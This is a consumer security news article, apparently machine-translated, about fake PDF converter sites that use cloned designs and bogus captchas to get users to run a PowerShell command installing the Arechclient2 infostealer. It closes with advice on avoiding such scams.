- False PDF converters are cheating users with cloned sites and fake captchas
- The Powershell command installs malware that steals browser and cryptographic wallet data
- The attackers use realistic designs and social engineering to avoid detection
Cybercriminals are using false PDF converters to install a powerful malware in victims systems, experts warned.
Cloudsek’s research found the attackers who clon popular archive conversion websites such as PDFCANDY.com, replicating their logo and brand elements, to deceive users to download malicious software.
Cloudsek says that these false sites are almost identical to the real ones. When someone tries to convert a file, the page shows a false load screen and then request a captcha verification. Instead of confirming that the user is human, this step leads to an instruction to execute a Powershell command. Following the command download a ZIP file containing malware known as Arechclient2, part of the Sectoprat information robbers family.
Collect personal data and worse
Malware uses a series of hidden methods to infect the system. Aterre the normal Windows processes to hide your activity and begin to collect browser passwords, cryptographic wallet information and other confidential data. Once the malware is active, you can return the stolen information to the attackers, reports Cloudsek.
The FBI has already warned that online file converters are becoming a popular way for criminals to spread their malware. Cloudsek’s research shows that attackers are improving their methods, skillfully combining realistic website designs with social engineering tricks to reduce user defenses.
Since online tools become part of daily work and personal life, it is important to know how to avoid these threats.
How to stay safe
The best way to protect is to avoid clicking on the random search results for online file converters. Always visit the official websites known directly.
In addition to that, always verify the website address for small spelling changes that could be easy to lose.
For a good starting point, see our rounding of the best PDF editors and the best free PDF editors. We also recommend the best Adobe Acrobat alternatives.
Staying cautious when uploading documents online can stop many of these attacks before starting.
Keep your updated antivirus software (you’re doing this anyway, right?) And scan any downloaded file before opening them. Installing browser extensions that block suspicious or dangerous sites can also help.
If a website asks you to run Powershell commands or download additional files after loading a document, close the page immediately.
Finally, if you think you have been deceived, disconnect the Internet device immediately, change all important passwords from a safe device and let your bank or service providers as soon as possible.
